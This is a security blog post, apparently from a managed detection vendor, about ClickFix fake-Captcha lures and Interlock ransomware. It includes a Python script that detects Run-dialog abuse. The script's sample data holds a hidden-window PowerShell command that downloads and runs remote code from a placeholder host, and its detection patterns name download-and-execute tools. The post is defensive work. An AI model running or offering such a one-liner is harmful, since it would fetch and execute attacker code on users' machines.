Tuesday, July 1, 2025

ClickFix and the Rise of Interlock Ransomware:



Background

ClickFix has rapidly become a rampant social-engineering tactic. First observed back in October 2023, it aims to trick users into pasting commands into the Windows Run dialog box under the guise of verifying the user's connection and authenticity to the domain. Because the victim executes the command themselves, the technique sidesteps controls that focus on malicious downloads or attachments. Given its ease of use and ability to bypass technical security measures, adoption of ClickFix has been rising at an alarming rate. [1]


Executive Summary

This investigation began after a user was observed navigating to a legitimate website that presented the user with a fake Captcha prompt. Once the fake Captcha instructions were carried out, a command reaching out to a malicious domain led to malicious scripts and file downloads on the user's asset.
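The ClickFix lure described in the Background section and the fake-Captcha chain summarised above leave two artifacts a responder can check on a Windows endpoint: the RunMRU registry key that records what was typed into the Run dialog, and a process-creation event in which explorer.exe (the Run dialog's host) spawns a scripting host that fetches and executes remote content. The script below, an added example and not LevelBlue's or SentinelOne's detection logic, scores both artifacts. The indicator patterns are generic ClickFix traits, not IOCs from this case, and every sample entry, command line and domain is constructed for the example.

```python
"""Detect ClickFix-style Run-dialog abuse from two Windows artifacts.

Added example, not LevelBlue's or SentinelOne's own detection logic. It checks
(1) the RunMRU registry values that record what a user typed into Win+R, and
(2) process-creation events in which explorer.exe spawns a scripting host that
fetches and runs remote content. All sample data is constructed; the domain
is a placeholder.
"""
import re
from urllib.parse import urlsplit

# Registry key that stores Run-dialog history (per user, inside NTUSER.DAT).
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Interpreters a pasted one-liner typically hands the payload to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

URL_RX = re.compile(r"https?://[^\s'\"<>]+", re.I)

# Traits of the pasted command. Assumption: these cover the common ClickFix
# variants; they are generic patterns, not IOCs from the LevelBlue case.
INDICATORS = [
    ("remote_fetch", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"curl|certutil\s+-urlcache|mshta\s+https?:)", re.I)),
    ("url", URL_RX),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hid(?:den)?\b", re.I)),
    ("encoded", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("inline_exec", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    # Decoy text appended so the visible part of the Run box reads like a
    # CAPTCHA step ("# I am not a robot - reCAPTCHA Verification ID: ...").
    ("captcha_lure", re.compile(r"(i am not a robot|verify you are human|captcha)", re.I)),
]


def parse_runmru(values):
    """Return the Run-dialog history, most recent first.

    `values` is the RunMRU key's name->data map. 'MRUList' orders the
    single-letter value names, and each entry carries the literal '\\1'
    suffix that Windows appends, which is stripped here.
    """
    history = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def score_command(cmd):
    """Names of the indicators present in a command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def is_clickfix(cmd):
    """Remote content fetched plus at least one evasion or decoy trait.

    A bare URL or download is not enough on its own (admins do that too);
    the hidden window, encoding, inline execution or CAPTCHA wording is what
    marks the Run-dialog lure.
    """
    hits = set(score_command(cmd))
    fetched = bool(hits & {"remote_fetch", "url"})
    suspicious = bool(hits & {"hidden_window", "encoded", "inline_exec", "captcha_lure"})
    return fetched and suspicious


def extract_domains(cmd):
    """Hostnames the command contacts, for blocklisting alongside file hashes."""
    hosts = []
    for url in URL_RX.findall(cmd):
        host = urlsplit(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def flag_process_event(event):
    """Evaluate one process-creation event (Sysmon ID 1 / Security 4688 fields).

    Returns a finding dict or None. The parent check matters: explorer.exe is
    what launches whatever the user typed into the Run dialog.
    """
    if event["parent"].lower() != "explorer.exe":
        return None
    if event["image"].lower() not in SCRIPT_HOSTS:
        return None
    if not is_clickfix(event["cmdline"]):
        return None
    return {"image": event["image"],
            "indicators": score_command(event["cmdline"]),
            "domains": extract_domains(event["cmdline"])}


# Constructed RunMRU dump: 'c' is the most recent entry (MRUList is "cab").
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": ('powershell -w hidden -c "irm https://captcha-check.example/v.txt | iex"'
          ' # I am not a robot - reCAPTCHA Verification ID: 6483\\1'),
}

# Constructed process events: the lure, an ordinary user-opened shell, and an
# admin script launched from cmd rather than from the Run dialog.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": SAMPLE_RUNMRU["c"][:-2]},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell"},
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": r"powershell -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for cmd in parse_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU  {'CLICKFIX' if is_clickfix(cmd) else 'ok      '} {cmd[:72]}")
    for ev in SAMPLE_EVENTS:
        finding = flag_process_event(ev)
        if finding:
            print("Process explorer.exe ->", finding["image"], finding["indicators"], finding["domains"])
```

On a live host the RunMRU values come from `reg query` or the user's NTUSER.DAT hive rather than the constructed dict; the parent-process requirement keeps the rule from firing on scripts launched by task schedulers or other shells, while the second sample event shows that a user simply opening PowerShell from the Run box is not flagged.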

The Interlock ransomware group was first observed in September 2024. Unlike most ransomware groups seen today, which operate Ransomware as a Service (RaaS) models, Interlock was an independent group. They gained notoriety back in October 2024 when they claimed responsibility for the Texas Tech University Health Sciences Center incident that compromised the data of approximately 1.5 million patients.

In January 2025, researchers at Sekoia observed Interlock expanding their tactics and leveraging the social engineering technique now known as ClickFix. [2]

Investigation

The LevelBlue MDR team observed two alarms on the same endpoint from SentinelOne, which prompted further investigation. During the investigation, our analysts uncovered the threat actors' tactics, techniques, and procedures (TTPs) and identified indicators of compromise (IOCs) associated with the Interlock ransomware group. Because of the swift action of the LevelBlue MDR team, the attack was contained, and the file hashes from the investigation were added to the blocklist within SentinelOne.

Read the full blog to learn the key takeaways from LevelBlue's investigation, including recommendations to prevent these attacks from affecting your organization.


[1] https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims

[2] https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar

The content provided herein is for general informational purposes only and should not be construed as legal, regulatory, compliance, or cybersecurity advice. Organizations should consult their own legal, compliance, or cybersecurity professionals regarding specific obligations and risk management strategies. While LevelBlue's Managed Threat Detection and Response solutions are designed to support threat detection and response at the endpoint level, they are not a substitute for comprehensive network monitoring, vulnerability management, or a full cybersecurity program.
